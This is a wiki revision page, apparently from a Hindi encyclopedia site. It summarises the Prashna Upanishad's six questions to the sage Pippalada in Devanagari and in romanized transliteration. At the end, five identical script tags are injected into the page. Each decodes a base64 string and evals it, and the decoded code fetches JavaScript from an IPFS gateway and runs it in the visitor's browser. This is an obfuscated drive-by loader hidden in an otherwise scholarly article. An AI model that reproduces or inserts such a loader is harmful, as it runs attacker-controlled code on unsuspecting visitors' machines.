Difference between revisions of "प्रश्नोपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{menu}}" to "")
 
(13 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 
{{अथर्ववेदीय उपनिषद}}
 
==प्रश्नोपनिषद / Prashnopnishad==
 
 
[[अथर्ववेद]] की पिप्पलाद शाखा के ब्राह्मण भाग से सम्बन्धित इस उपनिषद में जिज्ञासुओं द्वारा महर्षि पिप्पलाद से छह प्रश्न पूछे गये हैं।<br />  
 
[[अथर्ववेद]] की पिप्पलाद शाखा के ब्राह्मण भाग से सम्बन्धित इस उपनिषद में जिज्ञासुओं द्वारा महर्षि पिप्पलाद से छह प्रश्न पूछे गये हैं।<br />  
 
'''पहला प्रश्न'''<br />
 
'''पहला प्रश्न'''<br />
 
कात्यायन कबन्धी-'भगवन! यह प्रजा किससे उत्पन्न होती है?'<br />
 
कात्यायन कबन्धी-'भगवन! यह प्रजा किससे उत्पन्न होती है?'<br />
महर्षि पिप्पलाद-'प्रजा-वृद्धि की इच्छा करने वाले प्रजापति [[ब्रह्मा ]]ने 'रयि' और 'प्राण' नामक एक युगल से प्रजा की उत्पन्न कराई।'<br />
+
महर्षि पिप्पलाद-'प्रजा-वृद्धि की इच्छा करने वाले [[प्रजापति]] [[ब्रह्मा ]] ने 'रयि' और 'प्राण' नामक एक युगल से प्रजा की उत्पन्न कराई।'<br />
 
वस्तुत: प्राण गति प्रदान करने वाला चेतन तत्त्व है। रयि उसे धारण करके विविध रूप देने में समर्थ प्रकृति है। इस प्रकार ब्रह्मा मिथुन-कर्म द्वारा सृष्टि को उत्पन्न करता है।<br />  
 
वस्तुत: प्राण गति प्रदान करने वाला चेतन तत्त्व है। रयि उसे धारण करके विविध रूप देने में समर्थ प्रकृति है। इस प्रकार ब्रह्मा मिथुन-कर्म द्वारा सृष्टि को उत्पन्न करता है।<br />  
 
'''दूसरा प्रश्न'''<br />  
 
'''दूसरा प्रश्न'''<br />  
 
ऋषि भार्गव-'हे भगवन! प्रजा धारण करने वाले देवताओं की संख्या कितनी है और उनमें वरिष्ठ कौन है?'<br />
 
ऋषि भार्गव-'हे भगवन! प्रजा धारण करने वाले देवताओं की संख्या कितनी है और उनमें वरिष्ठ कौन है?'<br />
महर्षि पिप्पलाद-'[[पृथ्वी]], [[जल]], [[अग्नि]], [[वायु]] और [[आकाश]] तथा [[मन]], प्राण, वाणी, नेत्र और श्रोत्र आदि सभी देव हैं। ये जीव के आश्रयदाता है। सभी देवताओं मे प्राण ही सर्वश्रेष्ठ है। सभी इन्द्रियां प्राण के आश्रय में ही रहती हैं।'<br />
+
महर्षि पिप्पलाद-'[[पृथ्वी देवी|पृथ्वी]], [[जल]], [[अग्निदेव|अग्नि]], [[वायु देव|वायु]] और [[आकाश तत्व|आकाश]] तथा [[मन]], प्राण, वाणी, नेत्र और श्रोत्र आदि सभी देव हैं। ये जीव के आश्रयदाता है। सभी देवताओं में प्राण ही सर्वश्रेष्ठ है। सभी इन्द्रियां प्राण के आश्रय में ही रहती हैं।'<br />
 
'''तीसरा प्रश्न'''<br />
 
'''तीसरा प्रश्न'''<br />
 
कौसल्य आश्वलायन—'हे महर्षि! इस 'प्राण' की उत्पत्ति कहां से होती है, यह शरीर में कैसे प्रवेश करता है और कैसे बाहर निकल जाता है तथा कैसे दोनों के मध्य रहता है?'<br />
 
कौसल्य आश्वलायन—'हे महर्षि! इस 'प्राण' की उत्पत्ति कहां से होती है, यह शरीर में कैसे प्रवेश करता है और कैसे बाहर निकल जाता है तथा कैसे दोनों के मध्य रहता है?'<br />
Line 15: Line 12:
 
'''चौथा प्रश्न'''<br />
 
'''चौथा प्रश्न'''<br />
 
गार्ग्य ऋषि-' हे भगवन! इस पुरुष देह में कौन-सी इन्द्री शयन करती है और कौन-सी जाग्रत रहती है? कौन-सी इन्द्री स्वप्न देखती है और कौन-सी सुख अनुभव करती है? ये सब किसमें स्थित है?'<br />
 
गार्ग्य ऋषि-' हे भगवन! इस पुरुष देह में कौन-सी इन्द्री शयन करती है और कौन-सी जाग्रत रहती है? कौन-सी इन्द्री स्वप्न देखती है और कौन-सी सुख अनुभव करती है? ये सब किसमें स्थित है?'<br />
महर्षि पिप्पलाद—'हे गार्ग्य! जिस प्रकार [[सूर्य]] की रश्मियां सूर्य के अस्त होते ही सूर्य में सिमट जाती हैं और उसके उदित होते ही पुन: बिखर जाती हैं उसी प्रकार समस्त इन्द्रियां परमदेव मन में एकत्र हो जाती हैं। तब इस पुरुष का बोलना-चालना, देखना-सुनना, स्वाद-अस्वाद, सूंघना-स्पर्श करना आदि सभी कुछ रूक जाता है। उसकी स्थिति सोये हुए व्यक्ति-जैसी हो जाती है।'<br />
+
महर्षि पिप्पलाद—'हे गार्ग्य! जिस प्रकार [[सूर्य देवता|सूर्य]] की रश्मियां सूर्य के अस्त होते ही सूर्य में सिमट जाती हैं और उसके उदित होते ही पुन: बिखर जाती हैं उसी प्रकार समस्त इन्द्रियां परमदेव मन में एकत्र हो जाती हैं। तब इस पुरुष का बोलना-चालना, देखना-सुनना, स्वाद-अस्वाद, सूंघना-स्पर्श करना आदि सभी कुछ रूक जाता है। उसकी स्थिति सोये हुए व्यक्ति-जैसी हो जाती है।'<br />
 
'सोते समय प्राण-रूप अग्नि ही जाग्रत रहती है। उसी के द्वारा अन्य सोई हुई इन्द्रियां केवल अनुभव मात्र करती हैं, जबकि वे सोई हुई होती हैं।'<br />
 
'सोते समय प्राण-रूप अग्नि ही जाग्रत रहती है। उसी के द्वारा अन्य सोई हुई इन्द्रियां केवल अनुभव मात्र करती हैं, जबकि वे सोई हुई होती हैं।'<br />
 
'''पांचवां प्रश्न'''<br />
 
'''पांचवां प्रश्न'''<br />
 
सत्यकाम—'हे भगवन! जो मनुष्य जीवन भर 'ॐ' का ध्यान करता है, वह किस लोक को प्राप्त करता है?'<br />
 
सत्यकाम—'हे भगवन! जो मनुष्य जीवन भर 'ॐ' का ध्यान करता है, वह किस लोक को प्राप्त करता है?'<br />
महर्षि पिप्पलाद—'हे सत्यकाम! यह 'ॐकार' ही वास्तव में 'परब्रह्म' है। 'ॐ' का स्मरण करने वाला ब्रह्मलोक को ही प्राप्त करता है। यह तेजोमय सूर्यलोक ही ब्रह्मलोक है।'<br />
+
महर्षि पिप्पलाद—'हे सत्यकाम! यह 'ॐकार' ही वास्तव में 'परब्रह्म' है। 'ॐ' का स्मरण करने वाला [[ब्रह्मलोक]] को ही प्राप्त करता है। यह तेजोमय सूर्यलोक ही ब्रह्मलोक है।'<br />
 
'''छठा प्रश्न'''<br />
 
'''छठा प्रश्न'''<br />
 
सुकेशा भारद्वाज—'हे भगवन! कौसल देश के राजपुरुष हिरण्यनाभ ने सोलह कलाओं से युक्त पुरुष के बारे में मुझसे प्रश्न किया था, परन्तु मैं उसे नहीं बता सका। क्या आप किसी ऐसे पुरुष के विषय में जानकारी रखते हैं?'<br />
 
सुकेशा भारद्वाज—'हे भगवन! कौसल देश के राजपुरुष हिरण्यनाभ ने सोलह कलाओं से युक्त पुरुष के बारे में मुझसे प्रश्न किया था, परन्तु मैं उसे नहीं बता सका। क्या आप किसी ऐसे पुरुष के विषय में जानकारी रखते हैं?'<br />
 
महर्षि पिप्पलाद—'हे सौम्य! जिस पुरुष में सोलह कलाएं उत्पन्न होती हैं, वह इस शरीर में ही विराजमान है। उस पुरुष ने सर्वप्रथम 'प्राण' का सृजन किया। तदुपरान्त प्राण से 'श्रद्धा', 'आकाश', 'वायु', 'ज्योति', 'पृथ्वी', 'इन्द्रियां', 'मन' और 'अन्न' का सृजन किया। अन्न से 'वीर्य' , 'तप', 'मन्त्र', 'कर्म', 'लोक' एवं 'नाम' आदि सोलह कलाओं का सृजन किया।'<br />
 
महर्षि पिप्पलाद—'हे सौम्य! जिस पुरुष में सोलह कलाएं उत्पन्न होती हैं, वह इस शरीर में ही विराजमान है। उस पुरुष ने सर्वप्रथम 'प्राण' का सृजन किया। तदुपरान्त प्राण से 'श्रद्धा', 'आकाश', 'वायु', 'ज्योति', 'पृथ्वी', 'इन्द्रियां', 'मन' और 'अन्न' का सृजन किया। अन्न से 'वीर्य' , 'तप', 'मन्त्र', 'कर्म', 'लोक' एवं 'नाम' आदि सोलह कलाओं का सृजन किया।'<br />
 
 
<br />
 
<br />
==उपनिषद के अन्य लिंक==
+
==संबंधित लेख==
{{उपनिषद}}
+
{{संस्कृत साहित्य}}
 +
{{अथर्ववेदीय उपनिषद}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
[[Category:उपनिषद]]
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 13:44, 13 October 2011

atharvaved ki pippalad shakha ke brahman bhag se sambandhit is upanishad mean jijnasuoan dvara maharshi pippalad se chhah prashn poochhe gaye haian.
pahala prashn
katyayan kabandhi-'bhagavan! yah praja kisase utpann hoti hai?'
maharshi pippalad-'praja-vriddhi ki ichchha karane vale prajapati brahma ne 'rayi' aur 'pran' namak ek yugal se praja ki utpann karaee.'
vastut: pran gati pradan karane vala chetan tattv hai. rayi use dharan karake vividh roop dene mean samarth prakriti hai. is prakar brahma mithun-karm dvara srishti ko utpann karata hai.
doosara prashn
rrishi bhargav-'he bhagavan! praja dharan karane vale devataoan ki sankhya kitani hai aur unamean varishth kaun hai?'
maharshi pippalad-'prithvi, jal, agni, vayu aur akash tatha man, pran, vani, netr aur shrotr adi sabhi dev haian. ye jiv ke ashrayadata hai. sabhi devataoan mean pran hi sarvashreshth hai. sabhi indriyaan pran ke ashray mean hi rahati haian.'
tisara prashn
kausaly ashvalayan—'he maharshi! is 'pran' ki utpatti kahaan se hoti hai, yah sharir mean kaise pravesh karata hai aur kaise bahar nikal jata hai tatha kaise donoan ke madhy rahata hai?'
maharshi pippalad—' is pran ki utpatti atma se hoti hai. jaise sharir ki chhaya sharir se utpann hoti hai aur usi mean sama jati hai, usi prakar pran atma se prakat hota hai aur usi mean sama jata hai. vah pran man ke sankalp se sharir mean pravesh karata hai. maranakal mean yah atma ke sath hi bahar nikalakar doosari yoniyoan mean chala jata hai.'
chautha prashn
gargy rrishi-' he bhagavan! is purush deh mean kaun-si indri shayan karati hai aur kaun-si jagrat rahati hai? kaun-si indri svapn dekhati hai aur kaun-si sukh anubhav karati hai? ye sab kisamean sthit hai?'
maharshi pippalad—'he gargy! jis prakar soory ki rashmiyaan soory ke ast hote hi soory mean simat jati haian aur usake udit hote hi pun: bikhar jati haian usi prakar samast indriyaan paramadev man mean ekatr ho jati haian. tab is purush ka bolana-chalana, dekhana-sunana, svad-asvad, sooanghana-sparsh karana adi sabhi kuchh rook jata hai. usaki sthiti soye hue vyakti-jaisi ho jati hai.'
'sote samay pran-roop agni hi jagrat rahati hai. usi ke dvara any soee huee indriyaan keval anubhav matr karati haian, jabaki ve soee huee hoti haian.'
paanchavaan prashn
satyakam—'he bhagavan! jo manushy jivan bhar 'Om' ka dhyan karata hai, vah kis lok ko prapt karata hai?'
maharshi pippalad—'he satyakam! yah 'Omkar' hi vastav mean 'parabrahm' hai. 'Om' ka smaran karane vala brahmalok ko hi prapt karata hai. yah tejomay sooryalok hi brahmalok hai.'
chhatha prashn
sukesha bharadvaj—'he bhagavan! kausal desh ke rajapurush hiranyanabh ne solah kalaoan se yukt purush ke bare mean mujhase prashn kiya tha, parantu maian use nahian bata saka. kya ap kisi aise purush ke vishay mean janakari rakhate haian?'
maharshi pippalad—'he saumy! jis purush mean solah kalaean utpann hoti haian, vah is sharir mean hi virajaman hai. us purush ne sarvapratham 'pran' ka srijan kiya. taduparant pran se 'shraddha', 'akash', 'vayu', 'jyoti', 'prithvi', 'indriyaan', 'man' aur 'ann' ka srijan kiya. ann se 'viry' , 'tap', 'mantr', 'karm', 'lok' evan 'nam' adi solah kalaoan ka srijan kiya.'

sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>